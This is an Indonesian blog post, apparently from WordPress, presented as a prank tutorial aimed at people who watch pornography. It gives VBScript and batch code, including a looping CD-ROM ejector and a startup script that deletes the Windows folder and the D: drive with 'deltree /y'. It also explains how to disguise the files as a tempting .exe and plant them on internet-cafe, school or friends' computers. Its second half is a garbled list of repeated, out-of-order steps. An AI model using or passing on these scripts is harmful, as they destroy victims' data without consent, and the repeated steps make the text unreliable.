Jailin Orang Yang Suka Nonton Bokep

Jailin orang yang suka nonton bokep.? Ini mungkin ide yang pernah mampir difikiran kalian. Tapi gimana ya? Karena rasa keingin tahuan yang tinggi, semangat yang berkobar-kobar dan terus cari-cari referensi. dan akhirnya bisa juga untuk membuat suatu cara untuk menjahili orang-orang yang suka nonton bokep dengan beberapa script ringan ataupun dengan script yang mematikan. Hhhhaa.

OK, kita langsung saja ke cara pembuatannya,.,.,.
1. Buka Notepad kalian Klik icon Windows – accessories – Notepad
2. Nah sekarang masukkan script dibawah ini
hehe=msgbox("Jangan nonton bokep. Belom gede!",20,"Bokep Alert")
hehe=msgbox("Ye Dibilangin",20,"Bokep Alert")
3. Kemudian save as file tersebut dengan format .vbs (contohya : jail.vbs)
4. Kalau sudah sekarang kita buat file Bat
5. Buka Notepad kalian.
6. Masukkan script di atas tadi . Ket : ganti “namafile” dengan nama file vbs kalian.
7. Setelah itu simpan dengan format .bat (contoh : jail.bat)
  Nah badan dan kakinya udah jadi ni, sekarang kita coba memanipulasi file bat tersebut, dengan gambar yang lebih HOT!!! pastinya. Begini caranya  :
1. Download dulu programnya Download disini Cuma 520 Kb kok
2. Nah sekarang jalankan program tersebut.Capture 
3. Isi Batchfile dengan file bat kalian. 
4. Include dengn file vbs. 
5. Iconfile dengan gambar yang berformat .ico. 
6. dan ganti nama save as dengan nama yang menggoda ya!!
7. Setelah itu centang Ghost Application
8. Dan terakhir kalian klik Compile
Nah untuk supaya sempurna melakukan manipulasinya kalian pakai gambar dibawah ini :
  Nah sebelumnya saya pernah bilang kalau ada script ringan yang hanya untuk memperingati saja. Dan sekarang ada script yang lebih nampol nih.. ya mungkin bisa sedikit bikin kapok.
Kalian cukup mengganti script .vbs kalian dengan script dibawah ini :

  • Script untuk buat CD-ROM korban keluar masuk tanpa henti :

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

  • Script untuk buat komputer korban CRASH.

@echo off
echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat
echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

Nah untuk menjalankan aksinya kalian taro file .exe kalian di warnet-warnet, di flasdisk teman ataupun komputer sekolah. Jangan lupa taro juga file .vbs nya ditempat tersembunyi ya!

  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Kemudian simpan dengan format .vbs  (contoh:   jail.vbs)
  • Kalau sudah sekarang kita buat file Bat
  • Buka Notepad kalian.
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Kemudian simpan dengan format .vbs  (contoh:   jail.vbs)
  • Kalau sudah sekarang kita buat file Bat
  • Buka Notepad kalian.
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Kemudian simpan dengan format .vbs  (contoh:   jail.vbs)
  • Kalau sudah sekarang kita buat file Bat
  • Buka Notepad kalian.
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Kemudian simpan dengan format .vbs  (contoh:   jail.vbs)
  • Kalau sudah sekarang kita buat file Bat
  • Buka Notepad kalian.
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Kemudian simpan dengan format .vbs  (contoh:   jail.vbs)
  • Kalau sudah sekarang kita buat file Bat
  • Buka Notepad kalian.
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Kemudian simpan dengan format .vbs  (contoh:   jail.vbs)
  • Kalau sudah sekarang kita buat file Bat
  • Buka Notepad kalian.
  • Masukkan script berikut. Ket : ganti “namafile” dengan nama file vbs kalian.
  • Setelah itu simpan dengan format .bat (contoh : jail.bat)
  • Tinggalkan Balasan

    Isikan data di bawah atau klik salah satu ikon untuk log in:

    Logo WordPress.com

    You are commenting using your WordPress.com account. Logout / Ubah )

    Gambar Twitter

    You are commenting using your Twitter account. Logout / Ubah )

    Foto Facebook

    You are commenting using your Facebook account. Logout / Ubah )

    Foto Google+

    You are commenting using your Google+ account. Logout / Ubah )

    Connecting to %s

    %d blogger menyukai ini: